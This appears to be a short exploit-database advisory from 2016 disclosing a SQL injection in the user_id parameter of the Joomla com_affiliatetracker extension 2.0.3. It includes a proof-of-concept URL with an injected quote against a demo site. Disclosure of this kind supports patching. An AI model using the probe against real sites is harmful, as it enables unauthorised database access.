######################
# Exploit Title : Joomla com_affiliatetracker - SQL Injection
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/affiliate-tracker
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 2.0.3
# Date: 2016/06/13
######################
#
# PoC:
# First Login To Panel And Go To Affiliate Tracker
# user_id[] Parameter Vulnerable to SQL Injection
# Demo :
# http://demo.joomlathat.com/administrator/index.php?option=com_affiliatetracker&controller=conversions&user_id=398%27
# Image: http://www.uplooder.net/img/image/51/a4c21d46eac16c4646efbebaea7e551f/com-affiliatetracker.png
#
######################
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : persian-team.ir
######################